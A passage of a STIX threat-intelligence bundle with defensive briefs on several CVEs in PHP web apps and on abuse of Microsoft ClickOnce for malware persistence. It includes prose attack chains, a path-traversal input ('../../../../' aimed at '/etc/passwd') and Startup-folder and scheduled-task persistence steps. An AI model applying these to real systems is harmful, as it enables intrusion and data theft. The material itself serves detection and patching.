      "description": "## Overview\n\nA significant deserialization vulnerability, identified as CVE-2026-14637, has been discovered in kirilkirkov Ecommerce-CodeIgniter-Bootstrap, affecting all versions up to and including commit `13fd582aaf49aeab7438acc0fc3eb973a1f5e6a7`. This flaw resides within the `getCartItems` function of the `application/libraries/ShoppingCart.php` library. Attackers can remotely exploit this by manipulating the `shopping_cart` argument in web requests, which leads to insecure deserialization on the server. The vulnerability allows for arbitrary code execution, posing a critical risk to affected systems. An exploit for this issue has been publicly disclosed, meaning attackers can readily leverage it. Due to the product's continuous delivery model, specific version numbers are not available; instead, defenders are advised to apply the patch associated with commit `49b20f53de2b7ec34e920b11c863f1491d911a04` to mitigate immediate threats.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker crafts a malicious HTTP request (GET or POST) targeting a vulnerable kirilkirkov Ecommerce-CodeIgniter-Bootstrap instance.\n2.  The attacker includes a specially constructed `shopping_cart` argument in the HTTP request's parameters (e.g., query string or request body).\n3.  This `shopping_cart` argument contains serialized PHP objects specifically designed to trigger malicious behavior upon deserialization.\n4.  The vulnerable `application/libraries/ShoppingCart.php` library, particularly the `getCartItems` function, processes the incoming request.\n5.  The `getCartItems` function attempts to deserialize the attacker-controlled `shopping_cart` data without proper validation or sanitization.\n6.  During the insecure deserialization process, the crafted object triggers arbitrary code execution on the underlying web server, allowing the attacker to run commands.\n7.  Upon successful execution, the attacker can achieve remote code execution, enabling actions like web shell deployment, data exfiltration, or further system compromise.\n8.  The attacker establishes persistence or moves laterally within the compromised environment to achieve their final objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14637 grants remote attackers arbitrary code execution on the server hosting the Ecommerce-CodeIgniter-Bootstrap application. With a CVSS v3.1 Base Score of 8.2 (High), this vulnerability can lead to complete system compromise, including unauthorized access to sensitive data, modification or deletion of website content, and disruption of service. Given the public disclosure of an exploit, organizations using this product are at immediate and significant risk of attack, potentially resulting in data breaches, financial losses, and reputational damage.\n\n## Recommendation\n\n*   Prioritize patching CVE-2026-14637 by applying the commit `49b20f53de2b7ec34e920b11c863f1491d911a04` to all instances of kirilkirkov Ecommerce-CodeIgniter-Bootstrap immediately.\n*   Monitor webserver logs (category `webserver`) for HTTP requests targeting `application/libraries/ShoppingCart.php` that contain unusually long, malformed, or encoded `shopping_cart` argument values, which could indicate exploitation attempts for CVE-2026-14637.\n*   Review access logs for any suspicious process creation or outbound connections from the web server after a suspected exploitation attempt, as these could signal post-exploitation activity.\n",
      "published": "2026-07-04T18:21:02Z",
      "labels": [
        "deserialization",
        "remote-code-execution",
        "web-vulnerability",
        "php",
        "codeigniter"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14637"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--996b3c3c-edba-5997-b8d3-ba7b8b365931",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cdc2036f-6e19-5ba0-99e6-528ba6a85118",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f7bf979-f456-55ee-933b-1a05de13fe15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cdc2036f-6e19-5ba0-99e6-528ba6a85118",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cdc2036f-6e19-5ba0-99e6-528ba6a85118",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14635: Path Traversal in kirilkirkov Ecommerce-CodeIgniter-Bootstrap",
      "description": "## Overview\n\nA critical path traversal vulnerability, CVE-2026-14635, has been publicly disclosed and is actively exploitable in kirilkirkov Ecommerce-CodeIgniter-Bootstrap up to commit 222ff31c06687b1c6d0e1ab63953f82c3674c52b. This flaw specifically impacts the Vendor Multi-Image Endpoint, residing in the `application/modules/vendor/controllers/AddProduct.php` file. Remote attackers can leverage this vulnerability by manipulating the 'folder' argument within HTTP requests, allowing them to traverse directory structures and potentially access or modify arbitrary files outside the intended web root. The lack of traditional versioning due to the product's rolling release model means all installations prior to the patch commit are affected. A public exploit has been released, significantly increasing the risk of widespread exploitation. Defenders must prioritize applying patch `2a9497ff11f36e573ad99e1c357ff0e6ded49745` to mitigate this severe risk.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies an internet-facing instance of kirilkirkov Ecommerce-CodeIgniter-Bootstrap.\n2.  The attacker crafts a malicious HTTP POST request targeting the vulnerable `application/modules/vendor/controllers/AddProduct.php` endpoint.\n3.  The request includes a specially crafted `folder` argument containing directory traversal sequences, such as `../../../../` or its URL-encoded variants.\n4.  The `AddProduct.php` component processes the `folder` argument without proper sanitization or validation of the input path.\n5.  The application attempts to access, create, or modify a file at a location outside its intended directory, dictated by the attacker's manipulated `folder` argument.\n6.  The attacker successfully gains unauthorized access to sensitive system files (e.g., `/etc/passwd`, configuration files), or writes malicious content like web shells to accessible directories.\n7.  If a web shell is successfully deployed, the attacker can achieve remote code execution and further compromise the underlying server.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14635 can lead to severe consequences, including unauthorized access to sensitive system files, configuration files, and potentially user data. Attackers could also write malicious web shells to the server, leading to full remote code execution and complete system compromise. The availability of a public exploit significantly increases the likelihood of opportunistic attacks targeting vulnerable instances. Organizations failing to patch face data breaches, system defacement, or complete loss of control over their web application and underlying server infrastructure.\n\n## Recommendation\n\n*   Patch CVE-2026-14635 immediately by applying commit `2a9497ff11f36e573ad99e1c357ff0e6ded49745` to your kirilkirkov Ecommerce-CodeIgniter-Bootstrap installation.\n*   Deploy the Sigma rule provided in this brief to your web server logs (category: webserver) to detect exploitation attempts.\n*   Ensure comprehensive web server access logging is enabled to capture full HTTP request details, including URI path and query strings, for improved detection and forensic analysis.\n",
      "published": "2026-07-04T17:19:17Z",
      "labels": [
        "path-traversal",
        "web-application",
        "codeigniter",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14635"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--752ab8c2-ec53-5076-b5dc-52874e9f4db3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c9c54f41-07f3-5b37-a5d3-b4013b0d526a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c9c54f41-07f3-5b37-a5d3-b4013b0d526a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14622 — Jairiidriss restaurant-website-php-mysql Authentication Bypass",
      "description": "## Overview\n\nA high-severity authentication bypass vulnerability, tracked as CVE-2026-14622, has been discovered in the jairiidriss restaurant-website-php-mysql web application. This flaw impacts the `/admin/ajax_files` endpoint within the application's AJAX functionality, allowing remote attackers to circumvent authentication mechanisms. The vulnerability is present in versions up to commit `521428b5b612449df0cf4a5d15ee40cba67f3d35`. Exploitation involves performing a specific \"manipulation\" that results in missing authentication, granting unauthorized access to functionalities that should be restricted. The exploit code for this vulnerability has been made public, significantly increasing the risk of widespread exploitation. Due to the product's rolling release strategy, specific version numbers for affected or patched releases cannot be provided, and the project maintainers have not yet responded to the issue report.\n\n## Attack Chain\n\n1.  An attacker identifies a vulnerable instance of `jairiidriss restaurant-website-php-mysql` exposed on the internet.\n2.  The attacker sends an unauthenticated HTTP request (e.g., GET or POST) to the `/admin/ajax_files` endpoint.\n3.  Leveraging the missing authentication vulnerability, the server processes the attacker's request as if it originated from an authenticated user.\n4.  The attacker gains unauthorized access to sensitive administrative functionalities exposed via the AJAX endpoint.\n5.  This unauthorized access can lead to data manipulation, privilege escalation, or further compromise of the web application, depending on the specific functions exposed by `/admin/ajax_files`.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14622 allows an attacker to bypass intended authentication checks for the `/admin/ajax_files` endpoint. This grants unauthorized access to administrative functions, potentially leading to data modification, viewing sensitive information, or executing administrative commands, without needing legitimate credentials. The impact on affected organizations, which typically use this software for restaurant management, could include compromise of customer data, operational disruption, or defacement of their online presence. Given the public availability of the exploit, organizations running vulnerable instances are at immediate risk of compromise.\n\n## Recommendation\n\n*   Immediately apply any available patches or updates to `jairiidriss restaurant-website-php-mysql` once released by the vendor to address CVE-2026-14622.\n*   Implement a web application firewall (WAF) to detect and block suspicious requests targeting the `/admin/ajax_files` endpoint, especially unauthenticated attempts.\n*   Deploy the Sigma rule provided in this brief to your SIEM solution to detect direct successful access attempts to the `/admin/ajax_files` path.\n*   Review web server access logs for `/admin/ajax_files` to identify any past unauthorized access attempts, especially those resulting in successful (2xx) HTTP status codes from unknown or untrusted IP addresses.\n",
      "published": "2026-07-04T09:17:29Z",
      "labels": [
        "web-vulnerability",
        "authentication-bypass",
        "php",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14622"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--75254a4b-d46d-53aa-bb80-f066723c91f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7eb28e8b-2639-5535-802f-0801b57718f8",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4b6ca42-7c01-56e2-a5a6-87135f0bc816",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7eb28e8b-2639-5535-802f-0801b57718f8",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7eb28e8b-2639-5535-802f-0801b57718f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse of Microsoft ClickOnce Technology for Malware Distribution",
      "description": "## Overview\n\nMicrosoft's ClickOnce technology, a deployment mechanism intended to simplify application distribution and updates for developers and users, is identified as a potential vector for malware delivery by threat actors. This research, published by CrowdStrike on July 4, 2026, focuses on the inner workings of ClickOnce, detailing how applications are published and installed. While beneficial for legitimate software deployment, ClickOnce's design allows applications to be run and installed with minimal user interaction and without requiring administrative privileges, making it an appealing target for adversaries seeking an easy way to spread malicious software. The brief explains the technology's mechanics, setting the stage for subsequent analysis of its weaponization by threat actors and potential detection strategies.\n\n## Attack Chain\n\n1.  Attacker creates a malicious application and packages it using Microsoft's ClickOnce technology.\n2.  The malicious ClickOnce application package, including the `.application` manifest file, is hosted on an attacker-controlled web server.\n3.  The attacker socially engineers a user (e.g., via phishing) to visit a malicious webpage or click a link that points to the hosted ClickOnce deployment file.\n4.  Upon clicking an \"Install\" button or link, the user's system downloads the `.application` deployment manifest.\n5.  The user executes the downloaded `.application` file, initiating the ClickOnce deployment process.\n6.  The operating system displays a user confirmation prompt, which may lack publisher verification, leading the user to proceed with the installation.\n7.  Upon user confirmation, the malicious ClickOnce application is deployed and executed on the system without requiring elevated administrative privileges.\n8.  The malicious application proceeds to establish persistence, exfiltrate data, or perform other objectives defined by the attacker.\n\n## Impact\n\nIf successfully abused, ClickOnce's ability to deploy applications with minimal user interaction and without administrative privileges can lead to widespread malware infections, credential theft, data exfiltration, or further system compromise across targeted organizations. Its self-updating feature also means a persistently compromised application could serve as a continuous backdoor for attackers, allowing for long-term access and control. This part of the research does not detail specific victim counts or industry targets but highlights a significant attack surface for any organization utilizing Windows environments, as ClickOnce is a built-in Microsoft deployment technology.\n\n## Recommendation\n\n*   Enable comprehensive logging for process creation events on all Windows endpoints, focusing on processes related to application deployment and execution.\n*   Review Microsoft's documentation and security best practices for ClickOnce deployments to understand legitimate application behavior and artifacts.\n*   Ensure endpoint detection and response (EDR) solutions are configured to monitor execution of applications launched via deployment technologies like ClickOnce (e.g., those executed by `dfsvc.exe` or directly from `.application` files).\n*   Monitor network connections initiated by newly deployed or unfamiliar applications for suspicious outbound communication to detect potential C2 activity.\n",
      "published": "2026-07-04T08:38:30Z",
      "labels": [
        "microsoft",
        "deployment-technology",
        "malware-delivery",
        "potential-abuse",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--586b7838-677b-5279-97e7-86c1ecc6f7ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00bd1733-3001-570c-aa95-a395524b6486",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b08ea56-2963-5322-8b94-1464bd1bc3c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--daaeec8f-3468-5f9c-804e-6c5ef9612333",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfbe8774-718c-5fd2-8644-acd85fb9f043",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85903914-7667-5a59-a9d9-8a3278d9f80f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 2: Stop Threat Actors from Clicking Once and Staying Forever",
      "description": "## Overview\n\nThreat actors are increasingly weaponizing Microsoft's ClickOnce deployment technology to deliver malware and establish persistence on target systems, as detailed by CrowdStrike in June 2026. This abuse leverages the inherent user-friendliness of ClickOnce applications, which require minimal interaction for installation, enabling attackers to bypass traditional email filtering and user scrutiny of executable files. The primary motivation for this shift is the ease of initial access and persistence; attackers can either compromise legitimate ClickOnce servers to push malicious updates or trick users into installing benign apps that are later backdoored. Malware execution is cloaked within trusted Microsoft processes like `rundll32.exe` and `dfsvc.exe`, significantly complicating detection for security teams and enhancing stealth throughout the attack lifecycle. This trend highlights a critical blind spot in enterprise security, as `.application` files often fly under the radar compared to more heavily scrutinized `.exe` files, making it a powerful and effective vector for sophisticated adversaries.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors craft a malicious ClickOnce application and host it on a deployment server. They then trick users into clicking a link on a webpage or opening a `.application` file, which initiates the ClickOnce installation process, often bypassing email filtering and traditional executable scrutiny.\n2.  **Execution**: Upon user interaction, the ClickOnce application deploys and executes its payload. The malicious code runs under the guise of legitimate Microsoft processes, specifically within `rundll32.exe` and `dfsvc.exe` process trees.\n3.  **Persistence (Offline Shortcut)**: If the ClickOnce application is configured for offline availability, an application reference file (`.appref-ms`) is dropped into the user's Start Menu directory (e.g., `%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`).\n4.  **Persistence (Startup Folder)**: For automated execution, adversaries can strategically place the `.appref-ms` file in a user's Startup folder, causing the ClickOnce application to launch every time the user logs in.\n5.  **Persistence (Scheduled Task)**: Alternatively, attackers can create a scheduled task configured to automatically open the `.appref-ms` file at specific intervals or system events, ensuring regular re-execution of the malicious ClickOnce application.\n6.  **Defense Evasion \u0026 C2**: The `.appref-ms` file, when opened, triggers the ClickOnce components to fetch updates from the deployment server. If the server is controlled by the attacker or has been compromised, the malicious application can be updated with new components, allowing for C2 communication, lateral movement, or additional malicious activities without further user prompts.\n7.  **Impact**: The attacker gains remote access and persistence, enabling further actions such as data exfiltration, installation of additional malware, lateral movement, or system compromise, all while operating under the radar of traditional security tools.\n\n## Impact\n\nThe abuse of ClickOnce technology significantly lowers the barrier for entry for threat actors, enabling them to target standard user accounts and bypass typical security controls. This can lead to widespread compromise across various sectors, as any organization relying on Microsoft Windows endpoints is potentially vulnerable. If successful, attackers can establish persistent remote access, facilitate data exfiltration, deploy ransomware, or engage in lateral movement within the compromised network. The stealthy nature of this attack, executing within legitimate Microsoft processes, makes it difficult to detect, potentially leading to prolonged dwell times and extensive damage before discovery.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce activity.\n*   Enable Sysmon process-creation and file-creation logging to capture the artifacts necessary for the `Detect ClickOnce .appref-ms Persistence via Startup Folder` and `Detect Malicious ClickOnce Execution via rundll32 or dfsvc` rules.\n*   Monitor for the creation of `.appref-ms` files in unusual directories, especially user Startup folders, and investigate any scheduled tasks that launch these files.\n*   Educate users on the risks associated with installing software from untrusted sources, even if it appears to be a legitimate prompt from Microsoft ClickOnce.\n",
      "published": "2026-07-04T08:37:36Z",
      "labels": [
        "clickonce",
        "windows",
        "persistence",
        "defense-evasion",
        "initial-access",
        "microsoft"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b71c5934-fcbf-5354-a3e7-a029b1530668",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6fb1864b-ae56-56a9-8b51-1f655ae628fe",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9d95498-5597-5733-a750-66831955ec85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6fb1864b-ae56-56a9-8b51-1f655ae628fe",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6fb1864b-ae56-56a9-8b51-1f655ae628fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology: Inner Workings",
      "description": "## Overview\n\nCrowdStrike has published an analysis of the Microsoft ClickOnce technology, a deployment mechanism designed to simplify the distribution and installation of Windows applications. While intended for legitimate developers to easily share software, its design characteristics—such as minimal user interaction for deployment and not requiring administrative privileges—make it highly susceptible to abuse by threat actors. This first part of a two-part series details the internal workings of ClickOnce, explaining its publishing process and deployment journey. The article highlights that this user-friendly approach can be weaponized to spread malware, effectively turning a legitimate feature into a vector for initial access and execution. This brief serves to educate defenders on the underlying mechanisms before detailing specific weaponization methods and detection strategies in the subsequent part.\n\n## Attack Chain\n\nThis brief focuses on the technical inner workings of ClickOnce deployment rather than observed malicious attack chains. Therefore, a specific attack chain cannot be constructed from the provided content.\n\n## Impact\n\nIf abused, the ClickOnce technology can facilitate the deployment of various types of malware onto Windows endpoints, including ransomware, information stealers, or backdoors. Due to its design requiring minimal user interaction and no administrative privileges, successful exploitation would allow threat actors to bypass traditional installation hurdles, potentially leading to widespread compromise across targeted organizations and and exfiltration of sensitive data without immediate suspicion. The simplified deployment process could result in a higher success rate for initial access campaigns compared to methods requiring more complex user interactions or elevated privileges.\n\n## Recommendation\n\n* Familiarize security teams with the internal workings of ClickOnce technology described in this brief to better understand its attack surface.\n* Anticipate detection rule updates and threat intelligence from CrowdStrike's upcoming Part 2 brief, which will detail specific weaponization methods for ClickOnce.\n* Review existing endpoint security configurations to ensure monitoring for non-standard application installations and executions originating from untrusted sources, leveraging process creation and network connection logs.\n",
      "published": "2026-07-04T08:18:33Z",
      "labels": [
        "clickonce",
        "windows",
        "deployment",
        "application-delivery",
        "potential-abuse",
        "informational"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--efb1bb91-2fdc-5e49-9a1e-9350e1bf1c46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69e234b4-a1d4-522c-bb4d-18b8473074a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--96938787-a8c5-56c6-abdc-b8299efc52b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
